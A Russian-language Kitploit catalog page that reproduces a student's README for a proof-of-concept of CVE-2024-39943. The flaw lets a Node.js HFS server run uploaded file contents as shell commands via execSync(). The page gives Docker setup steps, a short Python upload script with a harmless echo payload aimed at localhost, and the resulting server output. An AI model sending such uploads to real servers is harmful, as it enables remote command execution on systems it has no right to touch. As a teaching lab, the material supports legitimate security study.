Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Node.js-CVE-2024-39943 — Эксплойт, подтверждающий концепцию для CVE-2024-39943, демонстрирующий удаленное выполнение кода через загрузку файлов на сервере Node.js HFS с использованием child_process.execSync(). | Kitploit
Инструменты/GitHubGitHub/jenmrr/node.js-cve-2024-39943
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

Эксплойт, подтверждающий концепцию для CVE-2024-39943, демонстрирующий удаленное выполнение кода через загрузку файлов на сервере Node.js HFS с использованием child_process.execSync().

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 год назадЕщё не проверено

Node.js HFS 명령어 실행 취약점 (CVE-2024-39943)

Школа WhiteHat, 3-й набор – Но Джонмин (@JenmrR)


Краткое описание

В среде сервера HFS на базе Node.js существует уязвимость, при которой содержимое загруженного файла выполняется через child_process.execSync().
Злоумышленник может напрямую выполнять команды ОС через функцию загрузки файлов, а также просматривать результаты внутренних команд сервера или управлять системой.
Эта уязвимость соответствует CVE-2024-39943 и представляет угрозу, равную по уровню опасности инъекции команд (удаленному выполнению кода).


Настройка и запуск окружения

  1. Запуск сервера через Docker
  2. Сервер принимает загрузку файлов по пути /upload и выполняет содержимое загруженного файла как команду.
  3. Злоумышленник может выполнить RCE через загрузку.

Порядок выполнения

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

Результат

Ответ сервера после выполнения PoC:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


Заключение

  • Данная уязвимость является типичной RCE (удаленное выполнение команд), возникающей при выполнении внешнего ввода в качестве команд ОС.
  • Непосредственное выполнение содержимого загруженного файла через execSync() создает серьезную угрозу безопасности.
  • Пользовательский ввод всегда должен проверяться и не должен выполняться непосредственно на сервере.

Скачать инструмент